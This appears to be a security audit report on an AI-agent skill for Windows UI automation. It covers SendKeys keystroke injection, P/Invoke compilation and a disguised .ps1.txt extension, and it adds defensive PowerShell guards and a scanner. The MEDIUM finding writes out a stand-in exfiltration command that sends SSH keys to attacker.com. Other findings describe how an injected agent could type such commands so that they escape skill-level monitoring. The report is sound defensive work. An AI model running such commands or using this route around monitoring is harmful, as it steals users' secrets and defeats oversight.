Is windows-ui-automation safe?
https://clawhub.ai/Wwb-Daniel/windows-ui-automation
This skill provides legitimate Windows UI automation via PowerShell but poses significant security risks because of its unrestricted keystroke injection and mouse control. The scripts compile C# at runtime to reach Win32 APIs through P/Invoke, accept arbitrary input without validation, and ship with a .ps1.txt extension that keeps PowerShell content out of extension-based filters and casual review. No direct malicious behavior was detected during installation and canary files remain intact, but the skill's core functionality enables hard-to-attribute attack chains: an agent could type exfiltration commands into a terminal, interact with confirmation dialogs, and drive the desktop, with any resulting network activity attributed to the terminal process rather than to the skill.
Findings (9)
CRITICAL PowerShell scripts with runtime C# compilation via P/Invoke -35
mouse_control.ps1.txt uses Add-Type to compile a C# snippet at runtime that declares user32.dll mouse_event through DllImport (P/Invoke). This is runtime compilation of managed code with a native call surface: the compiled assembly is a bridge into whichever Win32 API the script chooses to declare. Today it is limited to mouse events, but extending the same declaration to keybd_event, SendInput or window-management calls is a one-line change. Detection caveat: on Windows PowerShell 5.1, Add-Type shells out to csc.exe and writes a temporary assembly under %TEMP%, so a csc.exe child of powershell.exe is a useful hunting signal; PowerShell 7 compiles in-process, where script block logging is the fallback.
CRITICAL Unrestricted keystroke injection via SendKeys -35
keyboard_control.ps1.txt accepts arbitrary text via the -Text parameter and injects it with System.Windows.Forms.SendKeys.SendWait(). SendKeys delivers to whatever window has focus, so it can type into a PowerShell or cmd window, the Run dialog, or an admin console. Because the string is passed through unescaped, SendKeys syntax such as {ENTER}, {TAB}, ^c (Ctrl+C) and %y (Alt+Y) is honoured, which turns a "type this text" primitive into fully automated command execution through the UI layer. The typed command still appears in process-creation auditing (Security event 4688, Sysmon event 1) and in PowerShell logging of the receiving console, but it is recorded as the interactive user's own input with the terminal, not the skill, as the parent process, so attribution to the skill is lost.
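The difference between the pattern this finding describes and a guarded one, as an added example that is not the skill's code (function names, the UiGuard namespace and the deny list are this example's own choices): Send-RawText is the unescaped pass-through; Send-LiteralText wraps every SendKeys metacharacter in braces so the text is typed verbatim, rejects control characters, and refuses to deliver keys when the foreground window belongs to a shell, console or admin tool.

```powershell
# Added example, not part of windows-ui-automation.
Add-Type -AssemblyName System.Windows.Forms

# Minimal P/Invoke so we can learn which process owns the window that would receive the keys.
Add-Type -Namespace UiGuard -Name Native -MemberDefinition @'
[DllImport("user32.dll")]
public static extern IntPtr GetForegroundWindow();
[DllImport("user32.dll")]
public static extern uint GetWindowThreadProcessId(IntPtr hWnd, out uint processId);
'@

# The pattern the finding describes: caller-supplied text goes straight to SendKeys,
# so "{ENTER}" or "%y" inside $Text is executed as a key chord, not typed.
function Send-RawText {
    param([Parameter(Mandatory)][string]$Text)
    [System.Windows.Forms.SendKeys]::SendWait($Text)
}

# Hardened form. Process names that must never receive injected keys (example's own list).
$script:DeniedTargets = @('powershell', 'pwsh', 'cmd', 'WindowsTerminal', 'conhost',
                          'mmc', 'regedit', 'consent', 'explorer')

function ConvertTo-LiteralSendKeys {
    param([Parameter(Mandatory)][string]$Text)
    # SendKeys treats + ^ % ~ ( ) { } [ ] as syntax; wrapping each in braces makes it literal,
    # so "{ENTER}" becomes "{{}ENTER{}}" and is typed as text rather than pressed as a key.
    $special = [char[]]'+^%~(){}[]'
    $sb = [System.Text.StringBuilder]::new()
    foreach ($ch in $Text.ToCharArray()) {
        if ($special -contains $ch) { [void]$sb.Append('{').Append($ch).Append('}') }
        else                        { [void]$sb.Append($ch) }
    }
    $sb.ToString()
}

function Get-ForegroundProcessName {
    $hwnd = [UiGuard.Native]::GetForegroundWindow()
    $targetPid = [uint32]0
    [void][UiGuard.Native]::GetWindowThreadProcessId($hwnd, [ref]$targetPid)
    (Get-Process -Id $targetPid -ErrorAction SilentlyContinue).ProcessName
}

function Send-LiteralText {
    param([Parameter(Mandatory)][string]$Text)
    # Enter, Tab and other control characters are keys, not text; refuse them outright.
    if ($Text -match '[\x00-\x1F]') { throw 'Control characters (Enter, Tab, ...) are not accepted as text.' }
    $target = Get-ForegroundProcessName
    if (-not $target -or $target -in $script:DeniedTargets) {
        throw "Refusing to type into foreground process '$target'."
    }
    [System.Windows.Forms.SendKeys]::SendWait((ConvertTo-LiteralSendKeys -Text $Text))
}

# With a text editor focused this types the 13 characters "whoami{ENTER}" and presses nothing;
# with a console focused it throws instead of typing.
Send-LiteralText -Text 'whoami{ENTER}'
```

The foreground check is a race: the user (or another automation step) can change focus between the check and SendWait, so it is a guard against accidents and lazy prompt injection, not a security boundary. Any skill that needs real isolation should target a window handle it created itself rather than whatever happens to be in front.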
HIGH .ps1.txt extension hides PowerShell scripts from extension-based controls -15
The PowerShell scripts carry a .ps1.txt extension. This is not an execution policy bypass: execution policy is enforced when PowerShell loads a script, not by file extension, and Windows PowerShell (powershell.exe) rejects a -File argument that does not end in .ps1. The 'powershell -File' invocation given in the SKILL.md therefore only works if the files are renamed, or if their contents are run some other way (for example piped into Invoke-Expression or passed through -Command), and those routes sidestep execution policy whatever the extension is. The real effect of the extension is evasion: mail and download filters, AV/EDR rules keyed on .ps1, and reviewers skimming a file list are all less likely to inspect a .txt file.
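A pre-install audit for the three findings above, added here as an example and not part of the skill or of the clawhub scanner: it reads every file under a skill directory regardless of extension, so a .ps1.txt name cannot hide content, flags PowerShell syntax living under a non-.ps1 name, and reports lines that use SendKeys, runtime Add-Type compilation, Win32 P/Invoke, input-synthesis APIs, Invoke-Expression or brace-style special keys. The pattern list and the "looks like PowerShell" heuristic are this example's own choices, and Alt/Ctrl chord syntax (%y, ^c) is deliberately not matched because it collides with ordinary PowerShell and regex text.

```powershell
# Added example: static audit of a skill directory before enabling it.
$script:RiskyPatterns = @(
    @{ Name = 'SendKeys injection';      Regex = 'System\.Windows\.Forms\.SendKeys|\[SendKeys\]::Send' }
    @{ Name = 'Runtime code compilation'; Regex = '\bAdd-Type\b(?!\s+-AssemblyName)' }
    @{ Name = 'Win32 P/Invoke';          Regex = 'DllImport\s*\(\s*"(user32|kernel32|ntdll|advapi32)\.dll"' }
    @{ Name = 'Input synthesis API';     Regex = '\b(mouse_event|keybd_event|SendInput|SetCursorPos|SetForegroundWindow)\b' }
    @{ Name = 'Dynamic evaluation';      Regex = '\bInvoke-Expression\b|\biex\b' }
    @{ Name = 'Special-key syntax';      Regex = '\{(ENTER|TAB|ESC|ESCAPE|DEL|DELETE|F\d{1,2})\}' }
)

function Test-SkillScripts {
    param([Parameter(Mandatory)][string]$Path)
    $findings = [System.Collections.Generic.List[object]]::new()

    foreach ($file in Get-ChildItem -LiteralPath $Path -Recurse -File) {
        $text = Get-Content -LiteralPath $file.FullName -Raw -ErrorAction SilentlyContinue
        if ([string]::IsNullOrWhiteSpace($text)) { continue }

        # Double extension (.ps1.txt) or PowerShell syntax under a name that is not .ps1.
        $looksLikePs = $text -match '(?m)^\s*(param\s*\(|function\s+[\w-]+|Add-Type|\[[\w.]+\]::)'
        if ($file.Extension -ne '.ps1' -and ($file.Name -match '\.ps1\.' -or $looksLikePs)) {
            $findings.Add([pscustomobject]@{ File = $file.Name; Line = 0; Finding = 'PowerShell content without .ps1 extension' })
        }

        # Line-level matches so a reviewer can jump straight to the primitive.
        $lines = $text -split '\r?\n'
        for ($i = 0; $i -lt $lines.Count; $i++) {
            foreach ($p in $script:RiskyPatterns) {
                if ($lines[$i] -match $p.Regex) {
                    $findings.Add([pscustomobject]@{ File = $file.Name; Line = $i + 1; Finding = $p.Name })
                }
            }
        }
    }
    $findings
}

# Path is an assumption: point it at the unpacked skill directory.
Test-SkillScripts -Path '.\windows-ui-automation' | Sort-Object File, Line | Format-Table -AutoSize
```

Because the scan is text-based it catches the primitives however the file is named, but it will not see code that is assembled at runtime from string fragments; treat a hit on "Dynamic evaluation" as a reason to read the script by hand rather than as a complete finding.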
HIGH Full desktop control enables invisible attack chains -40
The combination of mouse movement, clicking, and arbitrary keystroke injection gives an AI agent complete control of the interactive desktop. A malicious prompt or a chained skill could instruct the agent to: (1) focus a terminal window, (2) type a data exfiltration command, (3) press Enter, (4) close the terminal. No network activity originates from the skill's own process; the traffic comes from the terminal the agent typed into, so monitoring scoped to the skill sees nothing. This makes the skill a powerful enabler for other attacks.
HIGH Skill acts as force multiplier for cross-skill attacks -30
While benign alone, this skill provides the 'hands' that other malicious skills need. A skill that knows what to exfiltrate but has no shell access could use windows-ui-automation to type commands into a terminal. This cross-skill attack surface is particularly dangerous because each skill may appear safe individually.
MEDIUM Keystroke injection enables indirect data exfiltration -25
Although the skill contains no direct exfiltration code, the keyboard automation can be used to type commands that read sensitive files and transmit their contents. Schematically: focus terminal → type a command along the lines of 'curl attacker.com -d @~/.ssh/id_rsa' → press Enter (the exact command depends on which shell has focus; in Windows PowerShell, for example, curl is an alias of Invoke-WebRequest with different syntax). The exfiltration happens through the OS, not the skill, making it invisible to skill-level monitoring.
MEDIUM Can interact with security dialogs; UAC prompts only when secure desktop is off -15
SendKeys special-key syntax ({TAB}, {ENTER}, %y for Alt+Y) can drive confirmation dialogs that run on the user's desktop at the agent's own integrity level, such as SmartScreen "Run anyway" prompts, browser permission dialogs and application "Allow" buttons. UAC elevation prompts are a different case: with the default "Switch to the secure desktop when prompting for elevation" setting they render on the secure desktop, which synthetic input from the user's desktop cannot reach, and User Interface Privilege Isolation additionally blocks input to higher-integrity windows. Approving elevation through this skill is therefore only plausible on hosts that have turned secure-desktop prompting off, which is worth checking before the skill is allowed anywhere near an administrator session.
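A host check for the condition described above, added as an example (not the skill's code): it reads the documented UAC policy values under HKLM and reports whether elevation prompts are drawn on the secure desktop, where SendKeys and SendInput cannot reach them, or on the user's desktop. The registry value names and their meanings are the Windows UAC policy values; the function name, the fallback defaults and the verdict wording are this example's own.

```powershell
# Added example: is this host's UAC prompt exposed to synthetic input?
function Get-UacPromptExposure {
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $p = Get-ItemProperty -Path $key

    # Fall back to a fresh install's defaults (1 / 5 / 1) when a value is absent (example's assumption).
    $enableLua = if ($null -ne $p.EnableLUA) { [int]$p.EnableLUA } else { 1 }
    $behavior  = if ($null -ne $p.ConsentPromptBehaviorAdmin) { [int]$p.ConsentPromptBehaviorAdmin } else { 5 }
    $secure    = if ($null -ne $p.PromptOnSecureDesktop) { [int]$p.PromptOnSecureDesktop } else { 1 }

    # ConsentPromptBehaviorAdmin: 0 = elevate silently, 1/2 = credentials/consent on the secure
    # desktop, 3/4 = credentials/consent on the user desktop, 5 = consent for non-Windows
    # binaries (default). PromptOnSecureDesktop = 1 forces the secure desktop for every prompt.
    $verdict = if ($enableLua -eq 0) { 'UAC disabled: no prompt exists; everything already runs elevated' }
               elseif ($behavior -eq 0) { 'Silent elevation: nothing to click; UAC offers no protection' }
               elseif ($secure -eq 1 -or $behavior -in @(1, 2)) { 'Prompts on secure desktop: unreachable by SendKeys/SendInput from the user desktop' }
               else { 'Prompts on user desktop: secure-desktop protection is off; treat the host as exposed' }

    [pscustomobject]@{
        EnableLUA                  = $enableLua
        ConsentPromptBehaviorAdmin = $behavior
        PromptOnSecureDesktop      = $secure
        Verdict                    = $verdict
    }
}

Get-UacPromptExposure
```

Reading this key needs no elevation, so the check can run from the same unprivileged session the agent would use. A "Prompts on user desktop" verdict does not by itself prove the dialog is clickable (UIPI still applies), but it removes the protection the finding above relies on and should be treated as a blocker for this skill.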
LOW Skill requests broad execution permissions implicitly -15
While no explicit prompt injection exists, the SKILL.md instructs the agent to execute PowerShell commands freely. The usage guide normalizes running PowerShell scripts with caller-supplied parameters, which conditions the agent to comply with PowerShell execution requests made in this skill's context.
INFO Framework accesses .env and .aws/credentials during install -10
Monitoring detected access to /home/oc-exec/.env and /home/oc-exec/.aws/credentials during installation. This appears to be the openclaw agent framework initialization rather than the skill itself, but it indicates that sensitive files are accessible in the execution environment.